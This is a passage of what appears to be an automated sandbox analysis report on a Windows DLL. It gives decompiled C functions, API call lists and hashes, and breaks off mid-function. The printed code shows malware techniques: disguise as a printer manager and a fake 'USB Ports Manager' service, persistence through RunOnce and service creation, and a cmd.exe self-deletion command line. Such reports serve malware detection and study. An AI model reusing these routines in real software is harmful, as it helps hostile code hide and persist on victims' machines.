      • Part of subcall function 6ECAA2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0), ref: 6ECAA323
      • Part of subcall function 6ECAA2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0,0000009C), ref: 6ECAA32A
      • Part of subcall function 6ECAA2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA33E
    • wsprintfA.USER32 ref: 6ECA4CEC
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6ECA4CF9
    • HeapFree.KERNEL32(00000000), ref: 6ECA4CFC
    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6ECA4D1F
    • RegDeleteValueA.ADVAPI32(?,00CB2CAC), ref: 6ECA4D42
    • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6ECA4D58
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA4D61
    • wsprintfA.USER32 ref: 6ECA4D7A
    • RegQueryValueExA.ADVAPI32 ref: 6ECA4DB3
    • GetProcessHeap.KERNEL32(00000008,?), ref: 6ECA4DC1
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA4DC4
    • RegQueryValueExA.ADVAPI32(00CB2CAC,00CB2CAC,00000000,?,00000000,?), ref: 6ECA4DE4
    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 6ECA4DEC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA4E02
    • HeapFree.KERNEL32(00000000), ref: 6ECA4E05
    • RegSetValueExA.ADVAPI32(00000000,00CB2CAC,00000000,00000001,00000000,?), ref: 6ECA4E25
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA4E2E
    • HeapFree.KERNEL32(00000000), ref: 6ECA4E31
    • RegCloseKey.ADVAPI32(?), ref: 6ECA4E3C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Process$Value$AllocFree$ByteCharMultiQueryWidewsprintf$CloseCreateDeletelstrcmpi
    • String ID: "%s" f$%s\%s$RunO$nce
    • API String ID: 5215680-3682672340
    • Opcode ID: d13ea4d1230d09131a0b629fbea35cfda5f9d0b930acac27140d60669df593b3
    • Instruction ID: dbb5c930253fc97059f28de3dbbf116c37e076ff25efeaf4e77cdb0126003cc9
    • Opcode Fuzzy Hash: d13ea4d1230d09131a0b629fbea35cfda5f9d0b930acac27140d60669df593b3
    • Instruction Fuzzy Hash: 4441A171504702ABD710DBA9DD85F6BBBBCFBCAB08F00490CFA5597240EA70D805CB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E6ECA52B0(void* __ebp, intOrPtr _a4) {
    				char _v256;
    				char _v264;
    				long _v268;
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t7;
    				void* _t14;
    				long _t19;
    				void* _t25;
    				intOrPtr _t28;
    				void* _t30;
    				void* _t33;
    				intOrPtr _t36;
    				void* _t37;
    				void* _t38;
    				long* _t40;
    				long* _t41;
    
    				_t40 =  &_v268;
    				_t36 = _a4;
    				if(M6ECB050C != 0 || _t36 != 0) {
    					E6ECA4130();
    				}
    				_t7 = M6ECB0544; // 0x1
    				if(_t7 != 0 && (M6ECB0540 != 0 || _t36 != 0)) {
    					_t30 = M6ECB0534; // 0xcc2700
    					_push(1);
    					_push(L"Printer manager");
    					E6ECA4C30(_t7, _t30, L"UniPrint Manager");
    					_t40 =  &(_t40[5]);
    				}
    				_push(_t25);
    				_push(_t33);
    				_push(0);
    				_push(0);
    				E6ECA44D0(_t25, _t33);
    				E6ECA2DF0("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", ".pdll");
    				_t41 =  &(_t40[4]);
    				Sleep(0xfa0);
    				_t37 = HeapAlloc(GetProcessHeap(), 8, 0x400);
    				if(_t37 != 0) {
    					_v268 = GetTickCount();
    					_t19 = RtlRandom( &_v268);
    					wsprintfA(_t37, "/c ren \"%s*.*\" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q \"%s*.*\"", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", _t19, 0xa, "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" 
version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
    					_push(0);
    					_push(0);
    					_push(0);
    					E6ECA4230(0, "cmd.exe", _t37);
    					_t41 =  &(_t41[0xc]);
    					HeapFree(GetProcessHeap(), 0, _t37);
    				}
    				_t28 = M6ECB057C; // 0x0
    				wsprintfA( &_v264, "%s%s%c", "Global\\", _t28, 0x4b);
    				_t14 = OpenEventA(2, 0,  &_v256);
    				_t38 = _t14;
    				if(_t38 != 0) {
    					SetEvent(_t38);
    					return CloseHandle(_t38);
    				}
    				return _t14;
    			}


    APIs
    • Sleep.KERNEL32(00000FA0), ref: 6ECA5326
    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 6ECA5339
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA533C
    • GetTickCount.KERNEL32 ref: 6ECA534E
    • RtlRandom.NTDLL(?), ref: 6ECA535D
    • wsprintfA.USER32 ref: 6ECA5374
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA538F
    • HeapFree.KERNEL32(00000000), ref: 6ECA5392
    • wsprintfA.USER32 ref: 6ECA53B0
    • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6ECA53BE
    • SetEvent.KERNEL32(00000000), ref: 6ECA53CD
    • CloseHandle.KERNEL32(00000000), ref: 6ECA53D4
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$EventProcesswsprintf$AllocCloseCountFreeHandleOpenRandomSleepTick
    • String ID: %s%s%c$.pdll$/c ren "%s*.*" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q "%s*.*"$Global\$Printer manager$UniPrint Manager$cmd.exe
    • API String ID: 1614445722-1432403852
    • Opcode ID: 43e966bb3547ea9a23ecbd3629fe2537e07860e2ee82f4c375b95ebbd5bcfbde
    • Instruction ID: 871b8f119d8be8dae27d60de658c2a4e4f9830c2c9b5ca11ccc08e912b5101c3
    • Opcode Fuzzy Hash: 43e966bb3547ea9a23ecbd3629fe2537e07860e2ee82f4c375b95ebbd5bcfbde
    • Instruction Fuzzy Hash: 0C31D6B1941B12BBE62097D88E4AF9F3B79EB86B18F014504FF1557284F7B0A8048FA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E6ECA1100(intOrPtr _a4, intOrPtr _a8) {
    				short _v512;
    				short _v520;
    				short _v1036;
    				short _v1040;
    				short _v1044;
    				short _v1048;
    				short _v1052;
    				intOrPtr _t24;
    				WCHAR* _t39;
    				void* _t41;
    				intOrPtr _t65;
    				void* _t67;
    				void* _t73;
    				void* _t75;
    				long* _t77;
    
    				_t24 = _a4;
    				 *_t77 = 0;
    				if(_t24 != 2) {
    					if(_t24 != 3) {
    						goto L16;
    					} else {
    						CloseHandle( *(_a8 + 0x14));
    						return 1;
    					}
    				} else {
    					_t71 = _a8;
    					_v1052 =  *(_a8 + 0x10);
    					_t75 = E6ECAA360( *((intOrPtr*)( *(_a8 + 0x10) + 4)), 0, 0);
    					_t77 =  &(_t77[3]);
    					if(_t75 != 0) {
    						_t73 = E6ECAA360( *((intOrPtr*)(_t71 + 4)), ( *(_t71 + 0x1c) & 0x0000ffff) >> 0x00000007 & 0x00000001, 0);
    						_t77 =  &(_t77[3]);
    						if(_t73 != 0) {
    							wsprintfW( &_v1048, L"\\\\.\\%s%s", _t75, _t73);
    							_t77 =  &(_t77[4]);
    							PathRemoveFileSpecW( &_v1040);
    							PathAddBackslashW( &_v1040);
    							_t39 =  &_v1040;
    							__imp__SHCreateDirectoryExW(0, _t39, 0, _t67);
    							if(_t39 == 0 || _t39 == 0x50 || _t39 == 0xb7) {
    								wsprintfW( &_v1052, L"\\\\.\\%s%s", _t75, _t73);
    								_t77 =  &(_t77[4]);
    								_t41 = CreateFileW( &_v1044, 0xc0000000, 0, 0, 4, 0x80, 0);
    								if(_t41 != 0xffffffff) {
    									L11:
    									_v1052 = _t41;
    								} else {
    									if( *_v1048 != 0 && GetFileAttributesW( &_v1044) != 0xffffffff) {
    										_t65 =  *0x6ecb0270; // 0x0
    										wsprintfW( &_v520, L"%s%c%lu%s",  &_v1044, 0x2e, _t65, L".bak");
    										_t77 =  &(_t77[6]);
    										if(MoveFileExW( &_v1036,  &_v512, 0) != 0) {
    											_t41 = CreateFileW( &_v1036, 0xc0000000, 0, 0, 4, 0x80, 0);
    											if(_t41 != 0xffffffff) {
    												goto L11;
    											}
    										}
    									}
    								}
    							}
    							HeapFree(GetProcessHeap(), 0, _t73);
    						}
    						HeapFree(GetProcessHeap(), 0, _t75);
    					}
    					L16:
    					return  *_t77;
    				}
    			}


    APIs
    • CloseHandle.KERNEL32(?), ref: 6ECA12A8
      • Part of subcall function 6ECAA360: MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,76D26900,6ECA39D7,?,00000000,00000000), ref: 6ECAA37F
      • Part of subcall function 6ECAA360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6ECAA392
      • Part of subcall function 6ECAA360: HeapAlloc.KERNEL32(00000000), ref: 6ECAA399
      • Part of subcall function 6ECAA360: MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000), ref: 6ECAA3A9
    • wsprintfW.USER32 ref: 6ECA117D
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 6ECA1187
    • PathAddBackslashW.SHLWAPI(?), ref: 6ECA1192
    • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 6ECA11A1
    • wsprintfW.USER32 ref: 6ECA11C8
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6ECA11EA
    • GetFileAttributesW.KERNEL32(?), ref: 6ECA11FF
    • wsprintfW.USER32 ref: 6ECA122A
    • MoveFileExW.KERNEL32(?,?,00000000), ref: 6ECA123E
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6ECA125F
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA126E
    • HeapFree.KERNEL32(00000000), ref: 6ECA1275
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA127F
    • HeapFree.KERNEL32(00000000), ref: 6ECA1286
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$File$CreateProcesswsprintf$ByteCharFreeMultiPathWide$AllocAttributesBackslashCloseDirectoryHandleMoveRemoveSpec
    • String ID: %s%c%lu%s$.bak$\\.\%s%s
    • API String ID: 452034401-1383541090
    • Opcode ID: 155dca86c1cef4761c60092202460c18e4917c2a47c9285640b3692b4c8e6fc2
    • Instruction ID: 555547fb52a32462e05ff28968e5c989ea9b7a7bd55d82acf28e2188ba5197b8
    • Opcode Fuzzy Hash: 155dca86c1cef4761c60092202460c18e4917c2a47c9285640b3692b4c8e6fc2
    • Instruction Fuzzy Hash: A541B3B1244302ABD7209BACCD45F9B7BB9EB88715F004A08FB55D71C1E774E908CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 56%
    			E6ECA7F10(void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct HWND__* _a20) {
    				void* _t7;
    				struct HWND__* _t8;
    				struct HWND__* _t11;
    				void* _t16;
    				intOrPtr _t29;
    				intOrPtr _t31;
    				void* _t33;
    				void* _t35;
    				struct HINSTANCE__* _t40;
    				struct HWND__* _t41;
    				void* _t45;
    				void* _t46;
    				void* _t47;
    
    				_t45 = __ebp;
    				_t29 = _a8;
    				if(_t29 == 0x275b || _t29 == 0x2755 || _t29 == 0x2ae1) {
    					__eflags = 0;
    					return 0;
    				} else {
    					_t40 = _a4;
    					_t7 = E6ECA4E50(_t40, _t29);
    					_t47 = _t46 + 8;
    					_t35 = _t7;
    					_t8 = _a20;
    					_push(_t8);
    					_push(_a16);
    					_push(_a12);
    					if(_t35 == 0) {
    						_push(_t29);
    						_push(_t40);
    						M6ECB05E8();
    						_t41 = _t8;
    					} else {
    						_t41 = CreateDialogIndirectParamW(_t40, _t35, ??, ??, ??);
    						HeapFree(GetProcessHeap(), 0, _t35);
    					}
    					if(_t41 == 0) {
    						L17:
    						return _t41;
    					} else {
    						SetWindowTextA(_t41, 0x6ecad664);
    						if(_t29 != 0x2872) {
    							__eflags = _t29 - 0x2768;
    							if(_t29 != 0x2768) {
    								goto L17;
    							} else {
    								_t11 = GetDlgItem(_t41, 0x4e7d);
    								_push(0);
    								_push(0);
    								__eflags = _t11;
    								if(_t11 == 0) {
    									PostMessageA(_t41, 0x10, ??, ??);
    									goto L17;
    								} else {
    									PostMessageA(_t11, 0xf5, ??, ??);
    									return _t41;
    								}
    							}
    						} else {
    							_t56 = M6ECB04B4;
    							if(M6ECB04B4 != 0) {
    								E6ECA52B0(_t45, 1);
    								_t47 = _t47 + 4;
    								ExitProcess(0);
    							}
    							_push(0);
    							E6ECA28B0(".pdll");
    							_t16 = M6ECB0534; // 0xcc2700
    							_t31 = M6ECB0544; // 0x1
    							_push(0);
    							_push(L"Printer manager");
    							M6ECB0540 = E6ECA4C30(_t31, _t16, L"UniPrint Manager");
    							M6ECB050C = E6ECA3C60();
    							E6ECA4CA0(_t56, 0);
    							if(M6ECB04AC != 0) {
    								_t33 = M6ECB0534; // 0xcc2700
    								_push(0xffffffff);
    								E6ECA3610(_t33);
    								ExitProcess(0);
    							}
    							 *0x6ecb0398 = _t41;
    							CallWindowProcW(E6ECA7790, _t41, 0x83fc, GetWindowLongW(_t41, 0xfffffffc), 0);
    							SetWindowLongW(_t41, 0xfffffffc, E6ECA7790);
    							return _t41;
    						}
    					}
    				}
    			}


    APIs
      • Part of subcall function 6ECA4E50: FindResourceW.KERNEL32(?,?,00000005), ref: 6ECA4E61
      • Part of subcall function 6ECA4E50: LoadResource.KERNEL32(?,00000000), ref: 6ECA4E70
      • Part of subcall function 6ECA4E50: SizeofResource.KERNEL32(?,00000000), ref: 6ECA4E7E
      • Part of subcall function 6ECA4E50: LockResource.KERNEL32(00000000), ref: 6ECA4E87
      • Part of subcall function 6ECA4E50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 6ECA4E96
      • Part of subcall function 6ECA4E50: HeapAlloc.KERNEL32(00000000), ref: 6ECA4E9D
      • Part of subcall function 6ECA4E50: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6ECA4EA8
      • Part of subcall function 6ECA4E50: FreeResource.KERNEL32(00000000), ref: 6ECA4ED7
    • CreateDialogIndirectParamW.USER32 ref: 6ECA7F60
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA7F6B
    • HeapFree.KERNEL32(00000000), ref: 6ECA7F72
      • Part of subcall function 6ECA28B0: RtlZeroMemory.NTDLL(00000140,00000140), ref: 6ECA28C2
      • Part of subcall function 6ECA28B0: RtlZeroMemory.NTDLL(?,00000208), ref: 6ECA28D4
      • Part of subcall function 6ECA28B0: wsprintfA.USER32 ref: 6ECA28F3
      • Part of subcall function 6ECA28B0: wsprintfA.USER32 ref: 6ECA2911
      • Part of subcall function 6ECA28B0: FindFirstFileA.KERNEL32(?,?), ref: 6ECA2923
      • Part of subcall function 6ECA28B0: lstrcmpA.KERNEL32(?,6ECAD538), ref: 6ECA2950
      • Part of subcall function 6ECA28B0: lstrcmpA.KERNEL32(?,6ECAD534), ref: 6ECA2960
      • Part of subcall function 6ECA28B0: lstrcatA.KERNEL32(?,?), ref: 6ECA2973
      • Part of subcall function 6ECA28B0: DeleteFileA.KERNEL32(?), ref: 6ECA298C
      • Part of subcall function 6ECA28B0: FindNextFileA.KERNEL32(00000000,?), ref: 6ECA29AD
      • Part of subcall function 6ECA28B0: FindClose.KERNEL32(00000000), ref: 6ECA29B8
      • Part of subcall function 6ECA3C60: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6ECA3C7E
      • Part of subcall function 6ECA3C60: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6ECA3C8C
      • Part of subcall function 6ECA3C60: OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6ECA3CAA
      • Part of subcall function 6ECA3C60: wsprintfA.USER32 ref: 6ECA3CEF
      • Part of subcall function 6ECA3C60: CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6ECA3D1E
      • Part of subcall function 6ECA3C60: ChangeServiceConfig2A.ADVAPI32 ref: 6ECA3D74
      • Part of subcall function 6ECA3C60: wsprintfA.USER32 ref: 6ECA3D95
      • Part of subcall function 6ECA4CA0: wsprintfA.USER32 ref: 6ECA4CEC
      • Part of subcall function 6ECA4CA0: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6ECA4CF9
      • Part of subcall function 6ECA4CA0: HeapFree.KERNEL32(00000000), ref: 6ECA4CFC
      • Part of subcall function 6ECA4CA0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6ECA4D1F
      • Part of subcall function 6ECA4CA0: RegDeleteValueA.ADVAPI32(?,00CB2CAC), ref: 6ECA4D42
      • Part of subcall function 6ECA4CA0: RegCloseKey.ADVAPI32(?), ref: 6ECA4E3C
    • SetWindowTextA.USER32(00000000,6ECAD664), ref: 6ECA7F92
    • ExitProcess.KERNEL32 ref: 6ECA7FB9
    • ExitProcess.KERNEL32 ref: 6ECA801E
    • GetWindowLongW.USER32 ref: 6ECA802F
    • CallWindowProcW.USER32(Function_00007790,00000000,000083FC,00000000), ref: 6ECA8041
    • SetWindowLongW.USER32 ref: 6ECA804F
      • Part of subcall function 6ECA3610: CreateEnvironmentBlock.USERENV ref: 6ECA3641
      • Part of subcall function 6ECA3610: RtlZeroMemory.NTDLL(?,00000044), ref: 6ECA365B
      • Part of subcall function 6ECA3610: RtlZeroMemory.NTDLL ref: 6ECA3677
      • Part of subcall function 6ECA3610: CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6ECA36A6
      • Part of subcall function 6ECA3610: Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6ECA36B1
      • Part of subcall function 6ECA3610: DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6ECA36E4
      • Part of subcall function 6ECA3610: CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6ECA36EA
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: HeapProcess$CreateMemoryResourcewsprintf$FindWindowZero$CloseFileFreeOpenService$BlockDeleteEnvironmentExitLongManagerlstrcmp$AllocCallChangeConfig2DestroyDialogFirstHandleIndirectLoadLockMoveNextParamProcSizeofSleepTextUserValuelstrcat
    • String ID: .pdll$Printer manager$UniPrint Manager
    • API String ID: 2623091544-3698302044
    • Opcode ID: 210ebd118f70844dd7809d662236290ff8876c4c46ee09c03acd2e5e226fcf8e
    • Instruction ID: 1cd7f45f8d3a998998e82205b25e21a73cf7900f6c6550cf47939d07d21d7859
    • Opcode Fuzzy Hash: 210ebd118f70844dd7809d662236290ff8876c4c46ee09c03acd2e5e226fcf8e
    • Instruction Fuzzy Hash: 28312232605B12BBDA105BEC8E4DF9F7A78EB46719F104515FB25A72C4FB748800CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E6ECA3930(void* __ebx, void* _a4) {
    				long _v4;
    				long _v8;
    				CHAR* _t22;
    				long _t26;
    				int _t33;
    				void* _t34;
    				void* _t47;
    				signed int _t53;
    				void* _t54;
    				WCHAR* _t56;
    				long* _t59;
    
    				if(_a4 == 0) {
    					L19:
    					return 0;
    				}
    				_t56 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
    				if(_t56 == 0) {
    					L18:
    					HeapFree(GetProcessHeap(), 0, _a4);
    					goto L19;
    				}
    				_v4 = 0;
    				_t22 = GetCommandLineA();
    				_v8 = 0;
    				_t47 = E6ECAA3D0(_t22,  &_v8);
    				_t59 =  &(( &_v8)[2]);
    				if(_t47 == 0) {
    					L17:
    					HeapFree(GetProcessHeap(), 0, _t56);
    					goto L18;
    				}
    				_t26 = _v8;
    				if(_t26 <= 1) {
    					L15:
    					LocalFree(_t47);
    					if(_v4 != 0) {
    						_push( *_a4);
    						E6ECA3610(_t56);
    					}
    					goto L17;
    				} else {
    					_t53 = 1;
    					do {
    						if(_t53 >= _t26 - 1) {
    							goto L8;
    						}
    						if(lstrcmpiA( *(_t47 + _t53 * 4), "-svcr") == 0) {
    							_t54 = E6ECAA360( *((intOrPtr*)(_t47 + 4 + _t53 * 4)), 0, 0);
    							_t59 =  &(_t59[3]);
    							if(_t54 != 0) {
    								_v4 = 1;
    								_t33 = PathIsRelativeW(_t54);
    								_t34 = M6ECB0520; // 0xcbff88
    								if(_t33 == 0) {
    									_t34 = 0x6ecad664;
    								}
    								wsprintfW(_t56, L"\"%s%s\"", _t34, _t54);
    								_t59 =  &(_t59[4]);
    								HeapFree(GetProcessHeap(), 0, _t54);
    							}
    							L14:
    							goto L15;
    						}
    						_t26 = _v8;
    						L8:
    						_t53 = _t53 + 1;
    					} while (_t53 < _t26);
    					goto L14;
    				}
    			}


    APIs
    • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 6ECA394D
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA3950
    • GetCommandLineA.KERNEL32 ref: 6ECA3969
      • Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
      • Part of subcall function 6ECAA3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6ECAA3F4
    • lstrcmpiA.KERNEL32(?,-svcr), ref: 6ECA39B8
    • PathIsRelativeW.SHLWAPI ref: 6ECA39E9
    • wsprintfW.USER32 ref: 6ECA3A05
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 6ECA3A11
    • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 6ECA3A18
    • LocalFree.KERNEL32(00000000), ref: 6ECA3A20
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA3A46
    • HeapFree.KERNEL32(00000000), ref: 6ECA3A49
    • GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA3A57
    • HeapFree.KERNEL32(00000000), ref: 6ECA3A5A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$FreeProcess$AllocLocal$CommandLinePathRelativelstrcmpilstrlenwsprintf
    • String ID: "%s%s"$-svcr
    • API String ID: 3712600073-2880469085
    • Opcode ID: 5900a73de5cd8ee1dda31ceff6865f7564c1b15669d19b5f78cadcd3c4a4b900
    • Instruction ID: ebfe330a7752bc3a5539a3b4f39b704f88108655d9f6f5903f22294a8fc4b1a3
    • Opcode Fuzzy Hash: 5900a73de5cd8ee1dda31ceff6865f7564c1b15669d19b5f78cadcd3c4a4b900
    • Instruction Fuzzy Hash: A2319A31504612ABD6509FECC95CF9EBBB8EB85319F004918FA1997244E7B4E844CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA4130() {
    				char _v248;
    				char _v256;
    				void* _v260;
    				char _v264;
    				void* _t11;
    				intOrPtr _t12;
    				intOrPtr _t18;
    				void* _t37;
    				void* _t38;
    
    				_t11 = E6ECA3700("USBManager", 1);
    				_t38 = _t37 + 8;
    				if(_t11 == 0) {
    					return _t11;
    				}
    				if(M6ECB0544 != 0) {
    					_t18 =  *0x6ecb047c; // 0x0
    					wsprintfA( &_v264, "%s\\%s%c%s", _t18, "svchost", 0, 0x6ecad543);
